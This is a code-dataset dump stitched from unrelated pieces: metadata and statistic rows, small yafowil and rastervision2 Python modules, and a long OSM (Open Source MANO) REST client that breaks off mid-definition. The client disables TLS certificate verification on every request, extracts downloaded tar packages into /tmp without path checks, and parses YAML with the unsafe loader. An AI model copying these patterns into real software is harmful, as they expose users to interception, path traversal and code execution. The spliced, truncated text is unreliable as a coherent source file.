[ "BSD-2-Clause" ]
1
2019-06-12T06:50:15.000Z
2019-06-12T06:50:15.000Z
from yafowil.yaml.parser import YAMLParser
from yafowil.yaml.parser import parse_from_YAML
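This module only re-exports the parser names at the package root. A minimal smoke test, assuming `yafowil.yaml` is installed; it checks nothing beyond the fact that the re-exported names resolve:

# Assumes yafowil.yaml is installed; verifies the re-exports resolve.
from yafowil.yaml import YAMLParser, parse_from_YAML

assert callable(parse_from_YAML)
assert YAMLParser is not None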
30.333333
47
0.868132
14
91
5.5
0.5
0.285714
0.38961
0.545455
0.701299
0
0
0
0
0
0
0
0.087912
91
2
48
45.5
0.927711
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
7b1b967ed627b9e3fab4817057b1a854b9c7a7c9
364
py
Python
rastervision2/pytorch_backend/__init__.py
csaybar/raster-vision
617ca15f64e3b8a391432306a743f7d0dfff352f
[ "Apache-2.0" ]
1
2020-10-10T12:32:43.000Z
2020-10-10T12:32:43.000Z
rastervision2/pytorch_backend/__init__.py
csaybar/raster-vision
617ca15f64e3b8a391432306a743f7d0dfff352f
[ "Apache-2.0" ]
null
null
null
rastervision2/pytorch_backend/__init__.py
csaybar/raster-vision
617ca15f64e3b8a391432306a743f7d0dfff352f
[ "Apache-2.0" ]
1
2021-12-02T08:07:21.000Z
2021-12-02T08:07:21.000Z
# flake8: noqa
from rastervision2.pytorch_backend.pytorch_chip_classification_config import *
from rastervision2.pytorch_backend.pytorch_chip_classification import *
from rastervision2.pytorch_backend.pytorch_semantic_segmentation_config import *
from rastervision2.pytorch_backend.pytorch_semantic_segmentation import *


def register_plugin(registry):
    pass
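`register_plugin` is the hook a plugin registry would invoke when loading this package; since the implementation here is a no-op, it can be exercised with any argument. A minimal sketch, assuming the package is importable:

# Assumes rastervision2 is importable; the hook ignores its argument.
from rastervision2.pytorch_backend import register_plugin

register_plugin(registry=None)  # no-op by design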
33.090909
80
0.873626
41
364
7.390244
0.414634
0.224422
0.316832
0.409241
0.851485
0.851485
0.851485
0.422442
0
0
0
0.014925
0.07967
364
10
81
36.4
0.889552
0.032967
0
0
0
0
0
0
0
0
0
0
0
1
0.166667
false
0.166667
0.666667
0
0.833333
0
0
0
0
null
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
1
0
1
0
0
9
9e9973cf341425c200c2c2c1040ca32f18c8427a
75,712
py
Python
lib/osm/osmclient/clientv2.py
TCSOSM-20/LW-UI
70c3331278f71d3b22fc3a090d526b4b8106d155
[ "Apache-2.0" ]
null
null
null
lib/osm/osmclient/clientv2.py
TCSOSM-20/LW-UI
70c3331278f71d3b22fc3a090d526b4b8106d155
[ "Apache-2.0" ]
null
null
null
lib/osm/osmclient/clientv2.py
TCSOSM-20/LW-UI
70c3331278f71d3b22fc3a090d526b4b8106d155
[ "Apache-2.0" ]
null
null
null
# # Copyright 2018 EveryUP Srl # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import errno import requests import logging import tarfile import yaml import StringIO from lib.util import Util import hashlib import os import re from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) logging.basicConfig(level=logging.INFO) log = logging.getLogger('helper.py') logging.getLogger("urllib3").setLevel(logging.INFO) class Client(object): def __init__(self): self._token_endpoint = 'admin/v1/tokens' self._user_endpoint = 'admin/v1/users' self._host = os.getenv('OSM_SERVER', "localhost") self._so_port = 9999 self._base_path = 'https://{0}:{1}/osm'.format( self._host, self._so_port) def auth(self, args): result = {'error': True, 'data': ''} token_url = "{0}/{1}".format(self._base_path, self._token_endpoint) headers = {"Content-Type": "application/yaml", "accept": "application/json"} try: r = requests.post(token_url, json=args, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def switch_project(self, args): result = {'error': True, 'data': ''} token_url = "{0}/{1}".format(self._base_path, self._token_endpoint) headers = {"Content-Type": "application/yaml", "accept": "application/json"} try: r = requests.post(token_url, json=args, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def role_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/roles".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def role_create(self, token, role_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/roles".format(self._base_path) try: r = requests.post(_url, json=role_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def role_update(self, token, role_id, role_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = 
"{0}/admin/v1/roles/{1}".format(self._base_path, role_id) try: r = requests.patch(_url, json=role_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def role_delete(self, token, id, force=None): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} query_path = '' if force: query_path = '?FORCE=true' _url = "{0}/admin/v1/roles/{1}{2}".format( self._base_path, id, query_path) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def role_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/roles/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def user_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/users".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def user_create(self, token, user_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/users".format(self._base_path) try: r = requests.post(_url, json=user_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def user_update(self, token, id, user_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/users/{1}".format(self._base_path, id) try: r = requests.patch(_url, json=user_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def user_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/users/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) 
return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def get_user_info(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/users/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def get_domains(self, token): result = {'error': False, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/domains".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def get_projects(self, token, uuids): result = {'error': False, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} projects = [] try: for uuid in uuids: _url = "{0}/admin/v1/projects/{1}".format( self._base_path, uuid) r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) if r.status_code not in (200, 201, 202, 204): raise Exception() projects.append(Util.json_loads_byteified(r.text)) except Exception as e: log.exception(e) result['error'] = True result['data'] = str(e) return result result['data'] = projects return result def project_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/projects".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def project_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/projects/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def project_create(self, token, project_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/projects".format(self._base_path) try: r = requests.post(_url, json=project_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def project_edit(self, token, id, 
project_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/projects/{1}".format(self._base_path, id) try: r = requests.patch(_url, json=project_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False return result def project_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/projects/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def nst_details(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nst_content(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "text/plain", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates/{1}/nst".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json2yaml(yaml.load(str(r.text))) return result def nst_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsd_list(self, token, filter=None): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} query_path = '' if filter: query_path = '?_admin.type='+filter _url = "{0}/nsd/v1/ns_descriptors_content{1}".format( self._base_path, query_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vnfd_list(self, token, filter=None): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer 
{}'.format(token['id'])} query_path = '' if filter: query_path = '?_admin.type='+filter _url = "{0}/vnfpkgm/v1/vnf_packages_content{1}".format( self._base_path, query_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsi_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsilcm/v1/netslice_instances".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_instances_content".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vnf_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/vnfrs".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def pdu_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/pdu/v1/pdu_descriptors".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nst_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates/{1}?FORCE=True".format( self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False return result def nsd_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsd/v1/ns_descriptors_content/{1}".format( self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) 
result['data'] = str(e) return result if r: result['error'] = False if r.status_code != requests.codes.no_content: result['data'] = Util.json_loads_byteified(r.text) return result def vnfd_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/vnfpkgm/v1/vnf_packages_content/{1}".format( self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r: result['error'] = False if r.status_code != requests.codes.no_content: result['data'] = Util.json_loads_byteified(r.text) return result def nst_onboard(self, token, template): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates_content".format(self._base_path) try: fileName, fileExtension = os.path.splitext(template.name) if fileExtension == '.gz': headers["Content-Type"] = "application/gzip" else: headers["Content-Type"] = "application/yaml" r = requests.post(_url, data=template, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsd_onboard(self, token, package): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} with open('/tmp/' + package.name, 'wb+') as destination: for chunk in package.chunks(): destination.write(chunk) headers['Content-File-MD5'] = self.md5( open('/tmp/' + package.name, 'rb')) _url = "{0}/nsd/v1/ns_descriptors_content/".format(self._base_path) try: r = requests.post(_url, data=open( '/tmp/' + package.name, 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vnfd_onboard(self, token, package): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} with open('/tmp/' + package.name, 'wb+') as destination: for chunk in package.chunks(): destination.write(chunk) headers['Content-File-MD5'] = self.md5( open('/tmp/' + package.name, 'rb')) _url = "{0}/vnfpkgm/v1/vnf_packages_content".format(self._base_path) try: r = requests.post(_url, data=open( '/tmp/' + package.name, 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsd_create_pkg_base(self, token, pkg_name): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsd/v1/ns_descriptors_content/".format(self._base_path) try: self._create_base_pkg('nsd', pkg_name) headers['Content-Filename'] = pkg_name + '.tar.gz' r = requests.post(_url, data=open( '/tmp/' + pkg_name + '.tar.gz', 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) 
result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['data'] = r.json() result['error'] = False if r.status_code == requests.codes.conflict: result['data'] = "Invalid ID." return result def vnfd_create_pkg_base(self, token, pkg_name): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/vnfpkgm/v1/vnf_packages_content".format(self._base_path) try: self._create_base_pkg('vnfd', pkg_name) r = requests.post(_url, data=open( '/tmp/' + pkg_name + '.tar.gz', 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['data'] = r.json() result['error'] = False if r.status_code == requests.codes.conflict: result['data'] = "Invalid ID." return result def nsd_clone(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} # get the package onboarded tar_pkg = self.get_nsd_pkg(token, id) tarf = tarfile.open(fileobj=tar_pkg) tarf = self._descriptor_clone(tarf, 'nsd') headers['Content-File-MD5'] = self.md5( open('/tmp/' + tarf.getnames()[0] + "_clone.tar.gz", 'rb')) _url = "{0}/nsd/v1/ns_descriptors_content/".format(self._base_path) try: r = requests.post(_url, data=open('/tmp/' + tarf.getnames()[0] + "_clone.tar.gz", 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False if r.status_code == requests.codes.conflict: result['data'] = "Invalid ID." return result def vnfd_clone(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} # get the package onboarded tar_pkg = self.get_vnfd_pkg(token, id) tarf = tarfile.open(fileobj=tar_pkg) tarf = self._descriptor_clone(tarf, 'vnfd') headers['Content-File-MD5'] = self.md5( open('/tmp/' + tarf.getnames()[0] + "_clone.tar.gz", 'rb')) _url = "{0}/vnfpkgm/v1/vnf_packages_content".format(self._base_path) try: r = requests.post(_url, data=open('/tmp/' + tarf.getnames()[0] + "_clone.tar.gz", 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False if r.status_code == requests.codes.conflict: result['data'] = "Invalid ID." 
return result def nst_content_update(self, token, id, template): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates/{1}/nst_content".format( self._base_path, id) try: r = requests.put(_url, data=template, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False return result def nsd_update(self, token, id, data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} # get the package onboarded tar_pkg = self.get_nsd_pkg(token, id) tarf = tarfile.open(fileobj=tar_pkg) tarf = self._descriptor_update(tarf, data) headers['Content-File-MD5'] = self.md5( open('/tmp/' + tarf.getnames()[0] + ".tar.gz", 'rb')) _url = "{0}/nsd/v1/ns_descriptors/{1}/nsd_content".format( self._base_path, id) try: r = requests.put(_url, data=open('/tmp/' + tarf.getnames()[0] + ".tar.gz", 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def vnfd_update(self, token, id, data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} # get the package onboarded tar_pkg = self.get_vnfd_pkg(token, id) tarf = tarfile.open(fileobj=tar_pkg) tarf = self._descriptor_update(tarf, data) headers['Content-File-MD5'] = self.md5( open('/tmp/' + tarf.getnames()[0] + ".tar.gz", 'rb')) _url = "{0}/vnfpkgm/v1/vnf_packages/{1}/package_content".format( self._base_path, id) try: r = requests.put(_url, data=open('/tmp/' + tarf.getnames()[0] + ".tar.gz", 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def get_nsd_pkg(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/zip", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsd/v1/ns_descriptors/{1}/nsd_content".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False tarf = StringIO.StringIO(r.content) return tarf return result def get_vnfd_pkg(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/zip", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/vnfpkgm/v1/vnf_packages/{1}/package_content".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False tarf = StringIO.StringIO(r.content) return tarf return result def _descriptor_update(self, tarf, data): # extract the package on a tmp directory tarf.extractall('/tmp') regex = re.compile(r"^[^/]+(/[^/]+\.(yaml|yml))$", re.U) for name 
in tarf.getnames(): if regex.match(name): with open('/tmp/' + name, 'w') as outfile: yaml.safe_dump(data, outfile, default_flow_style=False) break tarf_temp = tarfile.open( '/tmp/' + tarf.getnames()[0] + ".tar.gz", "w:gz") for tarinfo in tarf: tarf_temp.add('/tmp/' + tarinfo.name, tarinfo.name, recursive=False) tarf_temp.close() return tarf def _create_base_pkg(self, descriptor_type, pkg_name): filename = '/tmp/'+pkg_name+'/' + pkg_name + '.yaml' if descriptor_type == 'nsd': descriptor = { "nsd:nsd-catalog": { "nsd": [ { "short-name": str(pkg_name), "vendor": "OSM Composer", "description": str(pkg_name) + " descriptor", "vld": [], "constituent-vnfd": [], "version": "1.0", "id": str(pkg_name), "name": str(pkg_name) } ] } } elif descriptor_type == 'vnfd': descriptor = { "vnfd:vnfd-catalog": { "vnfd": [ { "short-name": str(pkg_name), "vdu": [], "description": "", "mgmt-interface": { "cp": "" }, "id": str(pkg_name), "version": "1.0", "internal-vld": [], "connection-point": [], "name": str(pkg_name) } ] } } if not os.path.exists(os.path.dirname(filename)): try: os.makedirs(os.path.dirname(filename)) except OSError as exc: # Guard against race condition if exc.errno != errno.EEXIST: raise with open('/tmp/' + pkg_name + '/' + pkg_name + '.yaml', 'w') as yaml_file: yaml_file.write(yaml.dump(descriptor, default_flow_style=False)) tarf_temp = tarfile.open('/tmp/' + pkg_name + '.tar.gz', "w:gz") tarf_temp.add('/tmp/'+pkg_name+'/' + pkg_name + '.yaml', pkg_name + '/' + pkg_name + '.yaml', recursive=False) tarf_temp.close() def _descriptor_clone(self, tarf, descriptor_type): # extract the package on a tmp directory tarf.extractall('/tmp') for name in tarf.getnames(): if name.endswith(".yaml") or name.endswith(".yml"): with open('/tmp/' + name, 'r') as outfile: yaml_object = yaml.load(outfile) if descriptor_type == 'nsd': nsd_list = yaml_object['nsd:nsd-catalog']['nsd'] for nsd in nsd_list: nsd['id'] = 'clone_' + nsd['id'] nsd['name'] = 'clone_' + nsd['name'] nsd['short-name'] = 'clone_' + nsd['short-name'] elif descriptor_type == 'vnfd': vnfd_list = yaml_object['vnfd:vnfd-catalog']['vnfd'] for vnfd in vnfd_list: vnfd['id'] = 'clone_' + vnfd['id'] vnfd['name'] = 'clone_' + vnfd['name'] vnfd['short-name'] = 'clone_' + vnfd['short-name'] with open('/tmp/' + name, 'w') as yaml_file: yaml_file.write( yaml.dump(yaml_object, default_flow_style=False)) break tarf_temp = tarfile.open( '/tmp/' + tarf.getnames()[0] + "_clone.tar.gz", "w:gz") for tarinfo in tarf: tarf_temp.add('/tmp/' + tarinfo.name, tarinfo.name, recursive=False) tarf_temp.close() return tarf def nsd_get(self, token, id): result = {'error': True, 'data': ''} headers = {'Content-Type': 'application/yaml', 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsd/v1/ns_descriptors/{1}/nsd".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False return yaml.load(r.text) else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def vnfd_get(self, token, id): result = {'error': True, 'data': ''} headers = {'Content-Type': 'application/yaml', 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/vnfpkgm/v1/vnf_packages/{1}/vnfd".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) 
return result if r.status_code in (200, 201, 202, 204): result['error'] = False return yaml.load(r.text) else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def nsd_artifacts(self, token, id): result = {'error': True, 'data': ''} headers = {'Content-Type': 'application/yaml', 'accept': 'text/plain', 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsd/v1/ns_descriptors/{1}/artifacts".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = r.text else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def vnf_packages_artifacts(self, token, id): result = {'error': True, 'data': ''} headers = {'Content-Type': 'application/yaml', 'accept': 'text/plain', 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/vnfpkgm/v1/vnf_packages/{1}/artifacts".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = r.text else: try: result['data'] = r.json() except Exception as e: result['data'] = {} return result def nsi_create(self, token, 